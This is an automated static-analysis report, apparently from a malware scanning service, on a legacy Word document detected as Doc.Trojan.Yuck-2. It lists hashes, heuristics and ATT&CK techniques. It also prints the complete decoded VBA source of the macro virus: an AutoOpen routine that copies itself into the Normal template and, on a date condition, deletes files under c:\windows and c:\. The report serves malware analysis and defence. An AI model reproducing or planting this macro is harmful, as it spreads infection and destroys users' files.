Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 645cba3c734231de…

MALICIOUS

Office (OLE)

28.5 KB Created: 1999-05-02 16:32:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9b6812b88e38dffcb6ed1e0f68fbcf45 SHA-1: 79552b5f56b2b93bba96a4813be238afe4b05c56 SHA-256: 645cba3c734231de7b511cfa707b2bd00128ef2d30f73899def934daa1318cda
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a legacy Word document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro attempts to copy itself to the Normal template and, under specific date conditions, attempts to delete files from the Windows directory and the root of the C drive. This behavior suggests a downloader or destructive payload, though the specific family is not identifiable.

Heuristics 4

  • ClamAV: Doc.Trojan.Yuck-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Yuck-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1512 bytes
SHA-256: 260f887beb1867bfcdc89290bbc83c9a36b9552e71c8783b479446ba3a58fe68
Detection
ClamAV: Doc.Trojan.Yuck-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Function CopyMac(kjszrkgeqhwreghfaetr, i23hqwbrjhwreqhecnwqgf4eqwhec) As Long
On Error GoTo EndCopyMac
Application.OrganizerCopy _
   Source:=kjszrkgeqhwreghfaetr, _
   Destination:=i23hqwbrjhwreqhecnwqgf4eqwhec, _
   Name:="AutoOpen", _
   Object:=wdOrganizerObjectProjectItems
EndCopyMac:
CopyMac = Err.Number
On Error GoTo 0
End Function
Sub MAIN()
uztrgkjerzthgkjrebtkerztchtz$ = ActiveDocument.FullName
jkdztuioegbkwetrwuqtgekqgrtwergvjweht$ = NormalTemplate.FullName
jkhkzrgbjhrg$ = "FUCK"
qwzefvnweqrhewlurlweb = CopyMac(uztrgkjerzthgkjrebtkerztchtz$, jkdztuioegbkwetrwuqtgekqgrtwergvjweht$)
If (qwzefvnweqrhewlurlweb = 5940) Then
    qwzefvnweqrhewlurlweb = CopyMac(jkdztuioegbkwetrwuqtgekqgrtwergvjweht$, uztrgkjerzthgkjrebtkerztchtz$)
  If (qwzefvnweqrhewlurlweb = 0) Then
     ActiveDocument.SaveAs _
        FileName:=uztrgkjerzthgkjrebtkerztchtz$, _
        FileFormat:=wdFormatTemplate
  End If
End If
If Day(Now()) = 2 Then
   jkhkzrgbjhrg$ = "FUCK"
   MsgBox ("Word is infected !!!")
End If
If (Day(Now()) = 10) And (Month(Now() = 10)) Then
   jkhkzrgbjhrg$ = "FUCK"
   Kill "c:\windows\*.*"
    Kill "c:\windows\system\*.*"
    Kill "c:\*.*"
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.